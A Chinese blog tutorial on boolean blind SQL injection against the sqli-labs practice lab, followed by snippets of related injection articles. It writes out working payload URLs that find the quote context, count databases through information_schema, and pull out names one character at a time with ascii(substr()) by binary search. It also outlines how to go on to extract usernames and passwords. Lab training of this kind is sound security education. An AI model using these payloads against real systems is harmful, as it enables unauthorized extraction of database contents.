盲注

最新推荐文章于 2024-04-12 13:04:35 发布
最新推荐文章于 2024-04-12 13:04:35 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41630808/article/details/80570197
版权
这个我用的是第五个做的盲注  如果你想做一个真的盲注 那在 http://127.0.0.1/sqli-labs/Less-8?id=1 以下方式同样适用
http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=1 --+ 正常
http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=2 --+ 正常
http://127.0.0.1/sqli-labs/Less-5?id=1' and 1=2 --+ 不正常
http://127.0.0.1/sqli-labs/Less-5?id=1' and 1=1 --+ 正常
说明 是字符串盲注 
 因为盲注前提是没有显示位  只能靠 页面是否正常 来判断 SQL语句 是否执行成功
在判断过程中 我只发现  You are in...........      
有变化 又只有添加了'才有变化  因此是字符串盲注
采用二分法判断范围 最终锁定
http://127.0.0.1/sqli-labs/Less-5?id=1' and (select count(schema_name) from information_schema.schemata)  >7--+
判断数据库数量  它大于6不小于7 小于8 因此 有7个数据库
ascii()使变量转化为十进制ASCII码 
substr函数的用法,取得字符串中指定起始位置和长度的字符串  ,默认是从起始位置到结束的子串。
http://127.0.0.1/sqli-labs/Less-5?id=1' and (select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))>105 --+
判断第一个数据库第一个字符 是i 因为Apache 第一个数据库是 information_schema
通过比较 它大于104 不小于105 小于106  所以 比对 ASCII码表得知为i 所以第一个数据库是 information_schema
 因为太繁琐  所以就不朝下作了
之后的就是这样一步步比对   
比较得到数据库
然后在数据库中比较所有字段 
然后在字段中 选择username password 去比较内容 
得到

vcdy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全进阶学习第十五课——Oracle SQL
p36273的博客
08-08 1638
Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。Oracle服务默认端口:1521Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。Oracle要求select … from 后必须要有查询的表名。
安全中级11:sql入+联合、报错、时间+sqlmap使用
weixin_62870380的博客
07-02 3621
sql入的原理和流程,以及联合入、报错入、时间、布尔以及sqlmap使用。
干货 Oracle入和漏洞利用姿势总结
最新发布
2401_84187635的博客
04-12 410
if ‘SMITH’ in res.text: # 为真时,即判断正确的时候的条件。(img-kmpW0H3S-1712898206497)](img-WvSzEJXT-1712898206497)](img-gC5fie7O-1712898206498)](img-lNMktoxz-1712898206498)]到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。– 授予相关 Java 权限。– 撤销相关 Java 权限。– 发起 HTTP 请求。– 发起 DNS 请求。
sqlmap如何进行时间的爆破
weixin_35749786的博客
12-20 373
SQLMap是一个开源的渗透测试工具,它可以用来执行自动化的SQL入攻击。在进行时间攻击时,SQLMap会尝试通过构造特殊的SQL语句来猜测数据库中的数据。 要使用SQLMap进行时间攻击,需要在命令行中输入以下命令: sqlmap -u URL--dbms=DBMS --time-sec=TIMESEC --technique=T --threads=THREADS ...
渗透测试-SQL入之布尔和时间
lza20001103的博客
04-20 2790
渗透测试-SQL入之布尔和时间
sql检测的简单脚本.zip
03-10
SQL(SQL Blind Injection)是一种常见的网络安全漏洞,它发生在Web应用程序中,攻击者通过提交特定的SQL查询到输入字段,然后根据系统响应或不响应来推断数据库的信息。这个"sql检测的简单脚本.zip"压缩包...
布尔.py_sqlpython_
10-03
布尔(Boolean-Based Blind Injection)是SQL入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,...
python编写的sql
10-28
python编写的sql
mssql.txt
07-18
mssql.txt
时间python脚本.zip
12-28
时间是一种常见的Web安全漏洞,它发生在数据库查询过程中,攻击者通过判断SQL查询返回结果的时间差异来获取数据库中的信息。在本压缩包"时间python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和...
SQL入技巧-暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
--理论知识
adaosanqian的博客
02-28 3731
关于布尔和时间的基础知识讲解
CTFHub SQl入 时间(sqlmap)
赤城封雪的博客
08-07 4945
CTFHub SQl入 时间(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可入的参数 2、判断可以用那种SQL入技术来入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的入模式: 1、基于布尔的,即可以根据返回页面判断条件真假的入。 2
原理基础
qq_58000413的博客
09-15 516
and substr((select table_name from information_schema.tables where table_schema=database()),1,1) >100 判断出表名。and if(ascii((substr(database(),1,1)))) 判断出数据库第一个字母的ascii值。and if(length(database())>12,0,sleep(4)) 判断出数据库长度。若需要闭合就手动帮闭合下。
布尔怎么用,一看你就明白了。布尔原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
数据库入学习笔记6----(布尔和时间入)
qq_41759633的博客
08-08 533
引:一般用于服务器没有给出sql执行后的回显,分为两类 布尔: 布尔很明显Ture跟Fales,也就是说它只会根据你的入信息返回Ture跟Fales,也就没有了之前的报错信息。 时间: 界面返回值只有一种,true无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看WEB页面返回的时间差来判断入语句是否正确 涉及的函数: Length(): 函数 返回字符...
sql获取数据库信息
weixin_48734687的博客
06-26 1217
sql获取数据库信息 **一、准备工作 1.浏览器登录dvwn,安全等级设置为low。 2.打开burp,设置ip和端口,确认和浏览器一致。 3.关闭proxy模块的数据包拦截(intercept is on 设置为 intercept is off)。 二、开始 (1)寻找入点 我们在user id输入框内依次输入“1’ and 1=‘1"和”1’ and 1=‘2“。发现返回值为真和假,此时可以确定网站查询使用的sql语句格式为: select [字段] from [表明] where Use
(转)SQL攻击的简单介绍
05-19 308
转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介 1.1 普通SQL入技术概述 目前没有对SQL入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]: (1) 脚本入式的攻击 (2) 恶意用户输入用来影响被执行的SQL脚本 根据Chris Anle...
mysql-blind(高级+基于布尔).docx
01-23
通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了这种技巧,关于的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的,不过我们今天暂时只针对布尔型做详细说明,关于其它的技巧,后续还会再单独说明,其实,也算不上什么很高级的技巧,都是一些很基础的堆砌,废话不多说,最好的办法还是直接通过实战来透彻理解

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值